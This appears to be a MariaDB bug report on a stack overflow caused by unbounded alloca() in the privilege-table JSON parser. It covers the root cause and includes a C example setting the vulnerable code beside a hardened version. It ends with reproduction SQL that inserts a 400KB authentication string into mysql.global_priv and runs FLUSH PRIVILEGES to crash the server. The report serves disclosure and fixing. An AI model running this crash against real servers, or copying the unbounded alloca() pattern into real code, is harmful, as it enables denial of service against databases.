MariaDB Server: MDEV-39266

Stack Overflow via alloca() in Privilege Table JSON Parser


Details

    • Can result in hang or crash

    Description

      Summary

      A stack overflow in sql/sql_acl.cc lets a user who can write to mysql.global_priv and run FLUSH PRIVILEGES crash the MariaDB server: an oversized string value in the Priv JSON column is copied into an unbounded alloca() buffer while the privilege tables are reloaded.

      Affected Versions

      • MariaDB 11.8.6 (confirmed)
      • MariaDB 11.4.10 (same code, confirmed by source)
      • All versions using `mysql.global_priv` JSON format (10.4+)

      Root Cause

      File: sql/sql_acl.cc, line 1772 (in class User_table_json):

      const char *get_str_value(MEM_ROOT *root, const char *key) const
      {
          size_t value_len;
          const char *value_start;
          if (get_value(key, JSV_STRING, &value_start, &value_len))
            return "";
          char *ptr= (char*)alloca(value_len);  // <-- STACK ALLOCATION, NO SIZE LIMIT
          if (!ptr)                              // <-- DEAD CODE: alloca() never returns NULL
            return NULL;
          // ...
      }
      

      value_len comes straight from json_get_object_key() on the Priv column of mysql.global_priv, a LONGTEXT column that can hold up to 4GB, so the length is entirely under the control of whoever can write that row. The alloca() call moves the stack pointer down by value_len with no upper bound check. When value_len exceeds the space left on the thread stack (thread_stack defaults to 299008 bytes, and that budget is shared with every frame already on the thread), the stack pointer leaves the thread's stack mapping altogether; the subsequent copy into the buffer then either hits the guard page or writes into whatever mapping lies below it, and the server crashes.

      The if (!ptr) return NULL check on line 1773 is dead code: alloca() never returns NULL. It either succeeds or has already pushed the stack pointer out of bounds by the time the pointer is used, so the check can never turn an oversized value into a clean error.
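      The pattern above beside a bounded alternative, as an added C example that is not MariaDB code. The toy JSON lookup (standing in for json_get_object_key()), SAMPLE_PRIV, heap_copy() (standing in for the copy into the MEM_ROOT) and the ALLOCA_LIMIT value are assumptions made for this illustration; the bounded variant keeps the cheap stack path for short values and stages anything larger on the heap, which is the check the original code lacks.

```c
/* Added example, not MariaDB code: the unbounded alloca() pattern from
 * get_str_value() beside a bounded variant.  The toy JSON lookup (standing
 * in for json_get_object_key()), SAMPLE_PRIV, heap_copy() (standing in for
 * the MEM_ROOT copy) and ALLOCA_LIMIT are assumptions made for this example. */
#include <alloca.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical cap on stack scratch space, far below the 299008-byte
 * default thread_stack that every frame on the thread shares. */
#define ALLOCA_LIMIT 4096

/* Constructed sample Priv document in the mysql.global_priv JSON shape. */
const char *SAMPLE_PRIV =
    "{\"access\":0,\"plugin\":\"mysql_native_password\","
    "\"authentication_string\":\"*NOTAREALHASH\",\"password_last_changed\":0}";

/* Toy lookup of a string-valued key in a flat object, no escape handling.
 * Returns 0 and sets *start/*len on success, 1 if the key is absent. */
int find_str_value(const char *json, const char *key, const char **start, size_t *len)
{
    char pat[128];
    if (snprintf(pat, sizeof pat, "\"%s\":\"", key) >= (int) sizeof pat) return 1;
    const char *p = strstr(json, pat);
    if (!p) return 1;
    p += strlen(pat);
    const char *q = strchr(p, '"');
    if (!q) return 1;
    *start = p; *len = (size_t) (q - p);
    return 0;
}

/* NUL-terminated heap copy of len bytes; the caller frees it. */
char *heap_copy(const char *s, size_t len)
{
    char *out = malloc(len + 1);
    if (!out) return NULL;
    memcpy(out, s, len);
    out[len] = '\0';
    return out;
}

/* Policy: a scratch buffer of len bytes or more must not live on the stack. */
int needs_heap(size_t len) { return len >= ALLOCA_LIMIT; }

/* VULNERABLE shape, as in the reported code: unbounded alloca() plus a NULL
 * check that can never fire.  A value larger than the remaining stack moves
 * the stack pointer out of the thread's stack before memcpy() runs, so never
 * call this with attacker-controlled lengths. */
char *get_str_value_unbounded(const char *json, const char *key)
{
    const char *start; size_t len;
    if (find_str_value(json, key, &start, &len)) return heap_copy("", 0);
    char *scratch = (char *) alloca(len + 1);   /* no upper bound */
    if (!scratch) return NULL;                   /* dead code */
    memcpy(scratch, start, len);
    scratch[len] = '\0';
    return heap_copy(scratch, len);
}

/* HARDENED: small values keep the cheap stack path, anything at or above
 * ALLOCA_LIMIT is staged on the heap, so stack use is bounded whatever the
 * Priv column holds.  Only the malloc() path can actually fail. */
char *get_str_value_bounded(const char *json, const char *key)
{
    const char *start; size_t len;
    if (find_str_value(json, key, &start, &len)) return heap_copy("", 0);
    int on_heap = needs_heap(len);
    char *scratch = on_heap ? (char *) malloc(len + 1) : (char *) alloca(len + 1);
    if (!scratch) return NULL;
    memcpy(scratch, start, len);
    scratch[len] = '\0';
    char *result = heap_copy(scratch, len);
    if (on_heap) free(scratch);
    return result;
}

/* Build a Priv document whose authentication_string is n bytes of 'X', the
 * REPEAT('X', 400000) payload, and return the length the bounded reader
 * recovers.  The same document through get_str_value_unbounded() would
 * overflow a default-sized thread stack. */
size_t bounded_read_length(size_t n)
{
    const char *head = "{\"access\":0,\"authentication_string\":\"";
    const char *tail = "\",\"password_last_changed\":0}";
    size_t hl = strlen(head), tl = strlen(tail);
    char *doc = malloc(hl + n + tl + 1);
    if (!doc) return 0;
    memcpy(doc, head, hl);
    memset(doc + hl, 'X', n);
    memcpy(doc + hl + n, tail, tl + 1);
    char *v = get_str_value_bounded(doc, "authentication_string");
    size_t got = v ? strlen(v) : 0;
    free(v); free(doc);
    return got;
}
```

      Both readers agree on ordinary-sized values; only the bounded one survives bounded_read_length(400000), because the 400000-byte scratch copy is staged with malloc() instead of alloca(). The same effect can be had in MariaDB's own idiom by allocating the scratch buffer from the MEM_ROOT once the length passes a threshold.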

      Reproduction Steps

      -- Prerequisite: an account that can INSERT into mysql.global_priv and run
      -- FLUSH PRIVILEGES (RELOAD privilege), e.g. root/SUPER on the MariaDB server
       
      -- Step 1: Insert crafted payload (400KB authentication_string)
      INSERT INTO mysql.global_priv (Host, User, Priv) VALUES 
      ('localhost', 'alloca_test', CONCAT(
        '{"access":0,"plugin":"mysql_native_password","authentication_string":"',
        REPEAT('X', 400000),
        '","password_last_changed":0}'));
       
      -- Step 2: Trigger FLUSH PRIVILEGES
      -- This calls get_str_value("authentication_string") → alloca(400000)
      -- Default thread_stack = 299008 bytes → STACK OVERFLOW → SERVER CRASH
      FLUSH PRIVILEGES;
      -- ERROR 2026 (HY000): TLS/SSL error: unexpected eof while reading
      -- (client was connected over TLS; a plaintext session reports
      --  ERROR 2013 (HY000): Lost connection to MySQL server during query)
      -- (Server process terminated)
      

          People

            Sergei Golubchik (serg)
            Weiheng Qiu (Weiheng)